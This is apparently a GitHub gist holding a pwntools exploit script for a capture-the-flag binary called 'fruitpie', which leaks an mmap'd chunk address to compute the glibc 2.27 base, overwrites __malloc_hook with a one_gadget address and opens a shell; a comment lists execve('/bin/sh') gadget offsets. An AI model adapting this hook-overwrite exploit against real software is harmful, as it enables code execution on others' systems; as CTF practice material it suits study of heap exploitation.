Created
April 22, 2021 08:15
-
-
Save Mech0n/c5e3ce4ef3306f8561027a11f5389035 to your computer and use it in GitHub Desktop.
mmap and libc_base
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/python | |
| #-*- coding: utf-8 -*- | |
| from pwn import * | |
| context.terminal = ['tmux', 'splitw', '-h'] | |
| context(arch = 'amd64' , os = 'linux', log_level='debug') | |
| p = process('./fruitpie') | |
| # gdb.attach(p, 'b *$rebase(0xCC9)\n') | |
| if __name__ == "__main__": | |
| p.sendlineafter("Enter the size to malloc:", str(0x30000)) | |
| p.recvuntil('0x') | |
| chunkaddr = int('0x' + p.recv(12), base=16) | |
| __malloc_hook = chunkaddr - 0x1ec3e0 | |
| libc_base = __malloc_hook - 0x3ebc30 | |
| success('CHUNK:\t' + str(hex(chunkaddr))) | |
| success('HOOK :\t' + str(hex(__malloc_hook))) | |
| success('LIBC :\t' + str(hex(libc_base))) | |
| offset = -0x1ec3e0 | |
| # offset = -2000000 | |
| p.sendlineafter("Offset:", str(hex(offset))) | |
| og = libc_base + 0x10a38c | |
| p.sendlineafter("Data:", p64(og)) | |
| # gdb.attach(p, 'b *$rebase(0xCE6)') | |
| p.interactive() | |
| ''' | |
| 0x4f2c5 execve("/bin/sh", rsp+0x40, environ) | |
| constraints: | |
| rsp & 0xf == 0 | |
| rcx == NULL | |
| 0x4f322 execve("/bin/sh", rsp+0x40, environ) | |
| constraints: | |
| [rsp+0x40] == NULL | |
| 0x10a38c execve("/bin/sh", rsp+0x70, environ) | |
| constraints: | |
| ''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
本地测试环境:
ldd (Ubuntu GLIBC 2.27-3ubuntu1) 2.27